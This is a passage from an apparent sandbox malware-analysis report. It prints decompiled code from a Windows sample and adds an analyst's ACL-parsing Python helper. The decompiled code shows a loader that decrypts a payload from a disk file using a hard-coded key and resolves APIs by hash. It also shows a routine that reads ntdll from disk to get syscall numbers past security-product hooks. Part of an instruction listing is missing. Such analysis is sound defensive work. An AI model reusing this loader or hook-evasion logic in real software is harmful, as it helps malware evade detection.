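    denied = {a["sid"] for a in aces if a["type"] == "ACCESS_DENIED" and a["mask"] & WRITE_RIGHTS}
    return any(a["type"] == "ACCESS_ALLOWED" and a["sid"] in WORLD_SIDS
               and a["mask"] & WRITE_RIGHTS and a["sid"] not in denied for a in aces)


# The stack SD exactly as E00405375 fills it in (pointer values into .rdata, not the pointed-to data).
SD_FROM_DECOMPILE = struct.pack("<BBHIIII", 1, 0, 4, 0x40735C, 0x40735C, 0, 0x40734C)
SETSEC_MASK = 0x80000007  # second argument of SetFileSecurityA in the same function
# Hypothetical DACLs: a restricted plugin directory (SYSTEM + Administrators) versus a plantable one.
FILE_ALL_ACCESS, OI_CI = 0x1F01FF, 0x03
RESTRICTED_DACL = build_acl([(0, OI_CI, FILE_ALL_ACCESS, "S-1-5-18"),
                             (0, OI_CI, FILE_ALL_ACCESS, "S-1-5-32-544")])
PLANTABLE_DACL = build_acl([(0, OI_CI, FILE_ALL_ACCESS, "S-1-1-0")])

if __name__ == "__main__":
    print(parse_absolute_sd(SD_FROM_DECOMPILE))
    print(decode_flags(SETSEC_MASK, SECURITY_INFORMATION))
    for name, acl in (("restricted", RESTRICTED_DACL), ("plantable", PLANTABLE_DACL)):
        print(name, parse_acl(acl), "world-writable:", world_writable(parse_acl(acl)))
```

To use it against the real sample, carve the bytes at 0x40734c (ACL) and 0x40735c (SID) out of the 0x407000 memory region listed in the associated dumps, feed the ACL to `parse_acl`, and compare the result with the restricted shape above; `parse_acl` raises if the AclSize header disagrees with the ACEs it contains, which is the usual sign of carving at the wrong offset.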

                                                                                    APIs
                                                                                    • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
                                                                                    • GetLastError.KERNEL32 ref: 004053CC
                                                                                    • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053E1
                                                                                    • GetLastError.KERNEL32 ref: 004053EB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                    • String ID: C:\Users\user\Desktop$Ls@$\s@
                                                                                    • API String ID: 3449924974-1782582443
                                                                                    • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                                                    • Instruction ID: 9862b429919ab471ad7b2dc8692991af43e8f75a2b46e14c68af8680499b7529
                                                                                    • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                                                    • Instruction Fuzzy Hash: 78010C71D14219DADF019BA0DC447EFBFB8EB04354F00453AE904B6180E3B89614CFA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 74%
                                                                                    			E737942C8(void* __eflags) {
                                                                                    				intOrPtr _v8;
                                                                                    				signed int _v12;
                                                                                    				signed int _v16;
                                                                                    				signed int _v20;
                                                                                    				signed int _v24;
                                                                                    				intOrPtr _v28;
                                                                                    				signed int _v32;
                                                                                    				void* _v36;
                                                                                    				char _v40;
                                                                                    				char _v41;
                                                                                    				char _v42;
                                                                                    				char _v43;
                                                                                    				char _v44;
                                                                                    				char _v45;
                                                                                    				char _v46;
                                                                                    				char _v47;
                                                                                    				char _v48;
                                                                                    				char _v49;
                                                                                    				char _v50;
                                                                                    				char _v51;
                                                                                    				char _v52;
                                                                                    				char _v53;
                                                                                    				char _v54;
                                                                                    				char _v55;
                                                                                    				char _v56;
                                                                                    				char _v57;
                                                                                    				char _v58;
                                                                                    				char _v59;
                                                                                    				char _v60;
                                                                                    				char _v61;
                                                                                    				char _v62;
                                                                                    				char _v63;
                                                                                    				char _v64;
                                                                                    				char _v65;
                                                                                    				char _v66;
                                                                                    				char _v67;
                                                                                    				char _v68;
                                                                                    				char _v69;
                                                                                    				char _v70;
                                                                                    				char _v71;
                                                                                    				char _v72;
                                                                                    				signed int _v76;
                                                                                    				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				short _v90;
				short _v92;
				short _v94;
				short _v96;
				short _v98;
				short _v100;
				short _v102;
				short _v104;
				short _v106;
				short _v108;
				short _v110;
				short _v112;
				short _v114;
				short _v116;
				short _v118;
				short _v120;
				short _v122;
				char _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				long _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v200;
				char _v268;
				char _v1308;
				short _t172;
				short _t173;
				short _t174;
				short _t175;
				short _t176;
				short _t177;
				short _t178;
				short _t179;
				short _t180;
				short _t181;
				short _t182;
				short _t183;
				short _t184;
				short _t185;
				short _t186;
				short _t187;
				short _t188;
				signed int _t202;
				void* _t204;
				void* _t210;
				signed int _t211;
				void* _t212;
				int _t214;
				intOrPtr _t222;
				signed int _t232;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				void* _t247;
				signed int _t248;
				void* _t250;
				signed int _t251;
				void* _t253;
				void* _t259;
				void* _t260;

				_t260 = __eflags;
				_v24 = _v24 & 0x00000000;
				_v140 = _v140 & 0x00000000;
				_v72 = 0x64;
				_v71 = 0x35;
				_v70 = 0x64;
				_v69 = 0x38;
				_v68 = 0x66;
				_v67 = 0x36;
				_v66 = 0x61;
				_v65 = 0x38;
				_v64 = 0x30;
				_v63 = 0x30;
				_v62 = 0x64;
				_v61 = 0x33;
				_v60 = 0x34;
				_v59 = 0x63;
				_v58 = 0x63;
				_v57 = 0x38;
				_v56 = 0x61;
				_v55 = 0x34;
				_v54 = 0x33;
				_v53 = 0x62;
				_v52 = 0x35;
				_v51 = 0x39;
				_v50 = 0x37;
				_v49 = 0x63;
				_v48 = 0x62;
				_v47 = 0x64;
				_v46 = 0x66;
				_v45 = 0x35;
				_v44 = 0x39;
				_v43 = 0x31;
				_v42 = 0x66;
				_v41 = 0x35;
				_v40 = 0;
				_v16 = _v16 & 0x00000000;
				_v76 = _v76 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_t172 = 0x65;
				_v124 = _t172;
				_t173 = 0x65;
				_v122 = _t173;
				_t174 = 0x79;
				_v120 = _t174;
				_t175 = 0x73;
				_v118 = _t175;
				_t176 = 0x6e;
				_v116 = _t176;
				_t177 = 0x32;
				_v114 = _t177;
				_t178 = 0x63;
				_v112 = _t178;
				_t179 = 0x75;
				_v110 = _t179;
				_t180 = 0x6e;
				_v108 = _t180;
				_t181 = 0x63;
				_v106 = _t181;
				_t182 = 0x65;
				_v104 = _t182;
				_t183 = 0x68;
				_v102 = _t183;
				_t184 = 0x39;
				_v100 = _t184;
				_t185 = 0x2e;
				_v98 = _t185;
				_t186 = 0x64;
				_v96 = _t186;
				_t187 = 0x6c;
				_v94 = _t187;
				_t188 = 0x6c;
				_v92 = _t188;
				_v90 = 0;
				_v8 = E737946E6();
				_v84 = E7379478E(_v8, 0x34cf0bf);
				_v88 = E7379478E(_v8, 0x55e38b1f);
				_v128 = E7379478E(_v8, 0xd1775dc4);
				_v180 = E7379478E(_v8, 0xd6eb2188);
				_v160 = E7379478E(_v8, 0xa2eae210);
				_v184 = E7379478E(_v8, 0xcd8538b2);
				_v132 = E7379478E(_v8, 0x8a111d91);
				_v136 = E7379478E(_v8, 0x170c1ca1);
				_v80 = E7379478E(_v8, 0xa5f15738);
				_v144 = E7379478E(_v8, 0x433a3842);
				_v156 = E7379478E(_v8, 0x2ffe2c64);
				_v176 = 0x2d734193;
				_v172 = 0x63daa681;
				_v168 = 0x26090612;
				_v164 = 0x6f28fae0;
				_t202 = 4;
				_t204 = E73794225(_t260,  *((intOrPtr*)(_t259 + _t202 * 0 - 0xac))); // executed
				_t261 = _t204;
				if(_t204 != 0) {
					L4:
					_v84(0x7918);
					L5:
					_v128(0,  &_v1308, 0x103);
					_t210 = CreateFileW(E737948E9(_t264,  &_v124), 0x80000000, 7, 0, 3, 0x80, 0);
					_v24 = _t210;
					if(_v24 != 0xffffffff) {
						_t211 = _v136(_v24, 0);
						_v16 = _t211;
						__eflags = _v16 - 0xffffffff;
						if(_v16 != 0xffffffff) {
							_t212 = VirtualAlloc(0, _v16, 0x3000, 4);
							_v12 = _t212;
							__eflags = _v12;
							if(_v12 != 0) {
								_t214 = ReadFile(_v24, _v12, _v16,  &_v140, 0);
								__eflags = _t214;
								if(_t214 != 0) {
									_v148 = _v12;
									_v28 = _v12 +  *((intOrPtr*)(_v148 + 0x3c));
									_t256 = _v28;
									_v152 = _v28 + ( *(_v28 + 0x14) & 0x0000ffff) + 0x18;
									_v20 =  *((intOrPtr*)(_v28 + 0x54));
									_v32 = _v32 & 0x00000000;
									while(1) {
										_t222 = _v28;
										__eflags = _v32 - ( *(_t222 + 6) & 0x0000ffff);
										if(_v32 >= ( *(_t222 + 6) & 0x0000ffff)) {
											break;
										}
										_t242 = _v32 * 0x28;
										_t256 = _v152;
										_t257 = _v20 +  *((intOrPtr*)(_t256 + _t242 + 0x10));
										_v20 = _v20 +  *((intOrPtr*)(_t256 + _t242 + 0x10));
										_t244 = _v32 + 1;
										__eflags = _t244;
										_v32 = _t244;
									}
									_v76 = _v16 - _v20;
									_v36 = VirtualAlloc(0, _v76, 0x3000, 4);
									E737946FE(_t256, _v36, _v12 + _v20, _v76);
									_t159 =  &_v72; // 0x64
									E73794029(_v36, _t159, 0x20);
									_t232 = E73793034(_t256, _t257, __eflags, _v36); // executed
									__eflags = _t232;
									if(_t232 != 0) {
										_v84(0xbb8);
										E73793005(_t256,  &_v200, 0x10);
										E73793005(_t256,  &_v268, 0x44);
										_t232 = _v160( &_v1308, _v156(0, 0, 0, 0x20, 0, 0,  &_v268,  &_v200));
										__eflags = _t232;
										if(_t232 != 0) {
											_t232 = _v88(0);
										}
									}
									ExitProcess(0);
								}
								return _t214;
							}
							return _t212;
						}
						return _t211;
					}
					return _t210;
				}
				_t245 = 4;
				_t247 = E73794225(_t261,  *((intOrPtr*)(_t259 + (_t245 << 0) - 0xac))); // executed
				_t262 = _t247;
				if(_t247 != 0) {
					goto L4;
				}
				_t248 = 4;
				_t250 = E73794225(_t262,  *((intOrPtr*)(_t259 + (_t248 << 1) - 0xac))); // executed
				_t263 = _t250;
				if(_t250 != 0) {
					goto L4;
				}
				_t251 = 4;
				_t253 = E73794225(_t263,  *((intOrPtr*)(_t259 + _t251 * 3 - 0xac))); // executed
				_t264 = _t253;
				if(_t253 == 0) {
					goto L5;
				}
				goto L4;
			}
Instruction listing for this function (only the address column survived extraction; the instruction text is missing): addresses run from 0x737942c8 through 0x737944cf.
                                                                                    0x737944d9
                                                                                    0x737944e5
                                                                                    0x737944f0
                                                                                    0x737944f5
                                                                                    0x737944f7
                                                                                    0x7379453a
                                                                                    0x7379453f
                                                                                    0x73794542
                                                                                    0x73794550
                                                                                    0x7379456f
                                                                                    0x73794572
                                                                                    0x73794579
                                                                                    0x73794585
                                                                                    0x7379458b
                                                                                    0x7379458e
                                                                                    0x73794592
                                                                                    0x737945a5
                                                                                    0x737945a8
                                                                                    0x737945ab
                                                                                    0x737945af
                                                                                    0x737945c8
                                                                                    0x737945ce
                                                                                    0x737945d0
                                                                                    0x737945da
                                                                                    0x737945ec
                                                                                    0x737945f6
                                                                                    0x737945fd
                                                                                    0x73794609
                                                                                    0x7379460c
                                                                                    0x73794619
                                                                                    0x73794619
                                                                                    0x73794620
                                                                                    0x73794623
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73794625
                                                                                    0x73794629
                                                                                    0x73794632
                                                                                    0x73794636
                                                                                    0x73794615
                                                                                    0x73794615
                                                                                    0x73794616
                                                                                    0x73794616
                                                                                    0x73794641
                                                                                    0x73794653
                                                                                    0x73794663
                                                                                    0x7379466a
                                                                                    0x73794671
                                                                                    0x73794679
                                                                                    0x7379467e
                                                                                    0x73794680
                                                                                    0x73794687
                                                                                    0x73794693
                                                                                    0x737946a1
                                                                                    0x737946ce
                                                                                    0x737946d4
                                                                                    0x737946d6
                                                                                    0x737946da
                                                                                    0x737946da
                                                                                    0x737946d6
                                                                                    0x737946df
                                                                                    0x737946df
                                                                                    0x00000000
                                                                                    0x737945d0
                                                                                    0x00000000
                                                                                    0x737945af
                                                                                    0x00000000
                                                                                    0x73794592
                                                                                    0x00000000
                                                                                    0x73794579
                                                                                    0x737944fb
                                                                                    0x73794506
                                                                                    0x7379450b
                                                                                    0x7379450d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73794511
                                                                                    0x7379451b
                                                                                    0x73794520
                                                                                    0x73794522
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73794526
                                                                                    0x73794531
                                                                                    0x73794536
                                                                                    0x73794538
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000

                                                                                    APIs
                                                                                      • Part of subcall function 73794225: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 7379426A
                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 7379456F
                                                                                      • Part of subcall function 73794225: Process32FirstW.KERNEL32(000000FF,0000022C), ref: 7379428E
                                                                                    • VirtualAlloc.KERNELBASE(00000000,000000FF,00003000,00000004), ref: 737945A5
                                                                                      • Part of subcall function 73794225: Process32NextW.KERNEL32(000000FF,0000022C), ref: 737942B9
                                                                                    • ReadFile.KERNELBASE(000000FF,00000000,000000FF,00000000,00000000), ref: 737945C8
                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 73794650
                                                                                    • ExitProcess.KERNEL32(00000000,00000000,00000000,00000000), ref: 737946DF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.223621335.0000000073793000.00000040.00020000.sdmp, Offset: 73790000, based on PE: true
                                                                                    • Associated: 00000000.00000002.223574209.0000000073790000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.223588828.0000000073791000.00000020.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.223600635.0000000073792000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.223638092.0000000073795000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AllocCreateFileProcess32Virtual$ExitFirstNextProcessReadSnapshotToolhelp32
                                                                                    • String ID: d5d8f6a800d34cc8a43b597cbdf591f5
                                                                                    • API String ID: 3683539093-1067640823
                                                                                    • Opcode ID: 1685f746481d3adc4da5d9f7ad9d2ba8a94fc16a290170efc9d95cfcbe809e92
                                                                                    • Instruction ID: b039ca52d1a99a082003ec24566ef60617cc6b802d9aa61aa5c866f0c58bef42
                                                                                    • Opcode Fuzzy Hash: 1685f746481d3adc4da5d9f7ad9d2ba8a94fc16a290170efc9d95cfcbe809e92
                                                                                    • Instruction Fuzzy Hash: 13D17730D04358EEFF21CBE4ED4ABEDBBB5AF04704F10419AE604BA291D7B50A54DB29
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 69%
                                                                                    			E7379370F(intOrPtr _a4) {
                                                                                    				signed int _v8;
                                                                                    				void* _v12;
                                                                                    				void* _v16;
                                                                                    				intOrPtr _v20;
                                                                                    				void* _v24;
                                                                                    				signed int _v28;
                                                                                    				intOrPtr _v32;
                                                                                    				signed int _v36;
                                                                                    				intOrPtr _v40;
                                                                                    				signed int _v44;
                                                                                    				signed int _v48;
                                                                                    				intOrPtr _v52;
                                                                                    				intOrPtr _v56;
                                                                                    				intOrPtr _v60;
                                                                                    				intOrPtr _v64;
                                                                                    				intOrPtr _v68;
                                                                                    				intOrPtr _v72;
                                                                                    				void* _v76;
                                                                                    				intOrPtr _v80;
                                                                                    				signed char _v84;
                                                                                    				long _v88;
                                                                                    				short _v90;
                                                                                    				short _v92;
                                                                                    				short _v94;
                                                                                    				short _v96;
                                                                                    				short _v98;
                                                                                    				short _v100;
                                                                                    				short _v102;
                                                                                    				short _v104;
                                                                                    				short _v106;
                                                                                    				char _v108;
                                                                                    				short _t141;
                                                                                    				short _t142;
                                                                                    				short _t143;
                                                                                    				short _t144;
                                                                                    				short _t145;
                                                                                    				short _t146;
                                                                                    				short _t147;
                                                                                    				short _t148;
                                                                                    				short _t149;
                                                                                    				int _t165;
                                                                                    				signed int _t169;
                                                                                    				intOrPtr _t175;
                                                                                    				signed int _t195;
                                                                                    				signed int _t210;
                                                                                    				signed int _t222;
                                                                                    
                                                                                    				_v24 = _v24 & 0x00000000;
                                                                                    				_v48 = _v48 & 0x00000000;
                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                    				// Builds the wide string L"ntdll.dll" on the stack one UTF-16 code unit at a time
                                                                                    				// ('n' 't' 'd' 'l' 'l' '.' 'd' 'l' 'l'), so the module name never exists as a contiguous
                                                                                    				// string in the binary. _v108 is the start of the buffer handed to E737948E9 for CreateFileW below.
                                                                                    				_t141 = 0x6e;
                                                                                    				_v108 = _t141;
                                                                                    				_t142 = 0x74;
                                                                                    				_v106 = _t142;
                                                                                    				_t143 = 0x64;
                                                                                    				_v104 = _t143;
                                                                                    				_t144 = 0x6c;
                                                                                    				_v102 = _t144;
                                                                                    				_t145 = 0x6c;
                                                                                    				_v100 = _t145;
                                                                                    				_t146 = 0x2e;
                                                                                    				_v98 = _t146;
                                                                                    				_t147 = 0x64;
                                                                                    				_v96 = _t147;
                                                                                    				_t148 = 0x6c;
                                                                                    				_v94 = _t148;
                                                                                    				_t149 = 0x6c;
                                                                                    				_v92 = _t149;
                                                                                    				_v90 = 0; // terminating NUL
                                                                                    				_v16 = _v16 & 0x00000000;
                                                                                    				_v12 = _v12 & 0x00000000;
                                                                                    				_v36 = _v36 & 0x00000000;
                                                                                    				_t23 =  &_v44;
                                                                                    				 *_t23 = _v44 & 0x00000000;
                                                                                    				_t222 =  *_t23;
                                                                                    				// E737946E6() returns a module base; E7379478E(base, hash) resolves one export of that module
                                                                                    				// by a 32-bit hash of its name (the hash routine is not shown on this page). Seven imports are
                                                                                    				// resolved up front and called through _v52.._v80 because the decompiler cannot name them.
                                                                                    				// Their uses in the code shown are consistent with GetFileSize (_v68), CloseHandle (_v56) and
                                                                                    				// ExitProcess (_v80); the other four are not used in the part of the function visible here.
                                                                                    				_v20 = E737946E6();
                                                                                    				_v64 = E7379478E(_v20, 0x8a111d91);
                                                                                    				_v68 = E7379478E(_v20, 0x170c1ca1);
                                                                                    				_v52 = E7379478E(_v20, 0xa5f15738);
                                                                                    				_v72 = E7379478E(_v20, 0x433a3842);
                                                                                    				_v56 = E7379478E(_v20, 0xd6eb2188);
                                                                                    				_v60 = E7379478E(_v20, 0x50a26af);
                                                                                    				_v80 = E7379478E(_v20, 0x55e38b1f);
                                                                                    				_v44 = 1; // abort flag: stays set unless the export lookup on the fresh mapping succeeds
                                                                                    				while(1) {
                                                                                    					// Opens ntdll.dll from disk: GENERIC_READ (0x80000000), FILE_SHARE_READ|WRITE|DELETE (7),
                                                                                    					// OPEN_EXISTING (3), FILE_ATTRIBUTE_NORMAL (0x80). Reading the on-disk file instead of the
                                                                                    					// already-loaded module yields a pristine copy that carries none of the hooks a security
                                                                                    					// product may have placed in the in-memory ntdll.
                                                                                    					_v16 = CreateFileW(E737948E9(_t222,  &_v108), 0x80000000, 7, 0, 3, 0x80, 0);
                                                                                    					if(_v16 == 0xffffffff) { // INVALID_HANDLE_VALUE
                                                                                    						break;
                                                                                    					}
                                                                                    					// _v68(hFile, NULL) checked against INVALID_FILE_SIZE (0xffffffff): consistent with GetFileSize
                                                                                    					_v36 = _v68(_v16, 0);
                                                                                    					__eflags = _v36 - 0xffffffff;
                                                                                    					if(_v36 != 0xffffffff) {
                                                                                    						// MEM_COMMIT|MEM_RESERVE (0x3000), PAGE_READWRITE (4): buffer for the raw file image
                                                                                    						_v12 = VirtualAlloc(0, _v36, 0x3000, 4);
                                                                                    						__eflags = _v12;
                                                                                    						if(_v12 != 0) {
                                                                                    							_t165 = ReadFile(_v16, _v12, _v36,  &_v88, 0);
                                                                                    							__eflags = _t165;
                                                                                    							if(_t165 != 0) {
                                                                                    								// Parse the PE headers of the raw file: e_lfanew (+0x3c) locates IMAGE_NT_HEADERS (_v32)
                                                                                    								_v76 = _v12;
                                                                                    								_v32 = _v12 +  *((intOrPtr*)(_v76 + 0x3c));
                                                                                    								// FileHeader.SizeOfOptionalHeader (NT+0x14); the section table starts at NT+0x18+that size (_v40)
                                                                                    								_t169 =  *(_v32 + 0x14) & 0x0000ffff;
                                                                                    								_t213 = _v32;
                                                                                    								_t68 = _t169 + 0x18; // 0x8000018
                                                                                    								_v40 = _v32 + _t68;
                                                                                    								// Allocate OptionalHeader.SizeOfImage (NT+0x50) bytes for the virtual layout of the module
                                                                                    								_v24 = VirtualAlloc(0,  *(_v32 + 0x50), 0x3000, 4);
                                                                                    								__eflags = _v24;
                                                                                    								if(_v24 != 0) {
                                                                                    									// E737946FE is used as memcpy(dst, src, len) (its first argument is a leftover register
                                                                                    									// value): copy OptionalHeader.SizeOfHeaders (NT+0x54) bytes of headers into the new image
                                                                                    									E737946FE(_t213, _v24, _v12,  *((intOrPtr*)(_v32 + 0x54)));
                                                                                    									// Copy every section from its file offset to its virtual address. IMAGE_SECTION_HEADER is
                                                                                    									// 0x28 bytes; NumberOfSections sits at NT+6; VirtualAddress +0xc, SizeOfRawData +0x10,
                                                                                    									// PointerToRawData +0x14. _v28 is the section index.
                                                                                    									_v28 = _v28 & 0x00000000;
                                                                                    									while(1) {
                                                                                    										_t175 = _v32;
                                                                                    										__eflags = _v28 - ( *(_t175 + 6) & 0x0000ffff);
                                                                                    										if(_v28 >= ( *(_t175 + 6) & 0x0000ffff)) {
                                                                                    											break;
                                                                                    										}
                                                                                    										E737946FE(_v40, _v24 +  *((intOrPtr*)(_v40 + 0xc + _v28 * 0x28)), _v12 +  *((intOrPtr*)(_v40 + 0x14 + _v28 * 0x28)),  *((intOrPtr*)(_v40 + 0x10 + _v28 * 0x28)));
                                                                                    										_t210 = _v28 + 1;
                                                                                    										__eflags = _t210;
                                                                                    										_v28 = _t210;
                                                                                    									}
                                                                                    									// Resolve the caller-supplied hash (_a4) against the freshly mapped copy, not the loaded ntdll
                                                                                    									_v48 = E7379478E(_v24, _a4);
                                                                                    									__eflags = _v48;
                                                                                    									if(_v48 != 0) {
                                                                                    										__eflags = _v16;
                                                                                    										if(_v16 != 0) {
                                                                                    											// kernel32 exports FindCloseChangeNotification at the same code as CloseHandle, which is
                                                                                    											// why decompilers often print it in place of CloseHandle: this closes the file handle
                                                                                    											FindCloseChangeNotification(_v16);
                                                                                    										}
                                                                                    										__eflags = _v12;
                                                                                    										if(_v12 != 0) {
                                                                                    											VirtualFree(_v12, 0, 0x8000); // MEM_RELEASE: the raw file buffer is no longer needed
                                                                                    										}
                                                                                    										_v44 = _v44 & 0x00000000; // success: clear the abort flag
                                                                                    										__eflags = 0;
                                                                                    										if(0 != 0) {
                                                                                    											continue;
                                                                                    										}
                                                                                    									} else {
                                                                                    									}
                                                                                    								} else {
                                                                                    								}
                                                                                    							} else {
                                                                                    							}
                                                                                    						} else {
                                                                                    						}
                                                                                    					} else {
                                                                                    					}
                                                                                    					L22:
                                                                                    					// Failure path (_v44 still set): close the handle through the hash-resolved import in _v56
                                                                                    					// (consistent with CloseHandle) and terminate through _v80(0); the APIs list above places
                                                                                    					// ExitProcess at ref 737946DF, so any failure here ends the process rather than falling back.
                                                                                    					if(_v44 != 0) {
                                                                                    						if(_v16 != 0) {
                                                                                    							_v56(_v16);
                                                                                    						}
                                                                                    						_v80(0);
                                                                                    					}
                                                                                    					// Walk the resolved export's code to its syscall stub:
                                                                                    					//   0xB8  mov eax, imm32  -> imm32 is the syscall number; stop
                                                                                    					//   0xE9  jmp rel32       -> follow the near jump (target = address + 5 + rel32)
                                                                                    					//   0xEA  jmp ptr16:32    -> follow the far jump to its absolute target
                                                                                    					//   anything else         -> advance one byte (not decoded, so a 0xB8/0xE9 inside an operand
                                                                                    					//                            is misread, and a routine without mov eax, imm32 never terminates)
                                                                                    					_v8 = _v48;
                                                                                    					while(1 != 0) {
                                                                                    						if(( *_v8 & 0x000000ff) != 0xb8) {
                                                                                    							__eflags = ( *_v8 & 0x000000ff) - 0xe9;
                                                                                    							if(( *_v8 & 0x000000ff) != 0xe9) {
                                                                                    								__eflags = ( *_v8 & 0x000000ff) - 0xea;
                                                                                    								if(( *_v8 & 0x000000ff) != 0xea) {
                                                                                    									_t195 = _v8 + 1;
                                                                                    									__eflags = _t195;
                                                                                    									_v8 = _t195;
                                                                                    								} else {
                                                                                    									_v8 =  *(_v8 + 1); // far jmp: absolute target
                                                                                    								}
                                                                                    							} else {
                                                                                    								_t125 =  *(_v8 + 1) + 5; // 0x5
                                                                                    								_v8 = _v8 + _t125; // near jmp: rel32 plus the 5-byte instruction length
                                                                                    							}
                                                                                    							continue;
                                                                                    						} else {
                                                                                    						}
                                                                                    						break;
                                                                                    					}
                                                                                    					_v8 = _v8 + 1;
                                                                                    					_v84 =  *_v8; // byte after 0xB8: the low byte of the imm32, i.e. the syscall number (only one byte is kept)
                                                                                    					if(_v24 != 0) {
                                                                                    						VirtualFree(_v24, 0, 0x8000);
                                                                                    					}
                                                                                    					return _v84;
                                                                                    				}
                                                                                    				goto L22;
                                                                                    			}

                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 73793811
                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 737939DE
                                                                                    Memory Dump Source
• Source File: 00000000.00000002.223621335.0000000073793000.00000040.00020000.sdmp, Offset: 73790000, based on PE: true
• Associated: 00000000.00000002.223574209.0000000073790000.00000002.00020000.sdmp
• Associated: 00000000.00000002.223588828.0000000073791000.00000020.00020000.sdmp
• Associated: 00000000.00000002.223600635.0000000073792000.00000002.00020000.sdmp
• Associated: 00000000.00000002.223638092.0000000073795000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CreateFileFreeVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 204039940-0
                                                                                    • Opcode ID: cfb8805cce7f14ed68710719503e796ee486ae88872c1886ab32e4ed3e39de44
                                                                                    • Instruction ID: 379a4de2a6d3bb6314f1196f81d51042774bcea6381b7cfa9cbaab9f2a03b887
                                                                                    • Opcode Fuzzy Hash: cfb8805cce7f14ed68710719503e796ee486ae88872c1886ab32e4ed3e39de44
                                                                                    • Instruction Fuzzy Hash: 0DA10334D00219EFEB11CFE4E989BADBBB5FF08325F20465AE511BB290D3755A40DB18
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405EE9(intOrPtr _a4) {
                                                                                    				char _v292;
                                                                                    				int _t10;
                                                                                    				struct HINSTANCE__* _t14;
                                                                                    				void* _t16;
                                                                                    				void* _t21;
                                                                                    
                                                                                    				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                                                                    				if(_t10 > 0x104) {
                                                                                    					_t10 = 0;
                                                                                    				}
                                                                                    				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                                                                    					_t16 = 1;
                                                                                    				} else {
                                                                                    					_t16 = 0;
                                                                                    				}
                                                                                    				_t5 = _t16 + 0x409010; // 0x5c
                                                                                    				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                                                                    				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                                                                                    				return _t14;
                                                                                    			}


                                                                                    APIs
                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00405F00
                                                                                    • wsprintfA.USER32 ref: 00405F39
                                                                                    • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
                                                                                    Strings
                                                                                    Memory Dump Source
• Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                    • String ID: %s%s.dll$UXTHEME$\
                                                                                    • API String ID: 2200240437-4240819195
                                                                                    • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
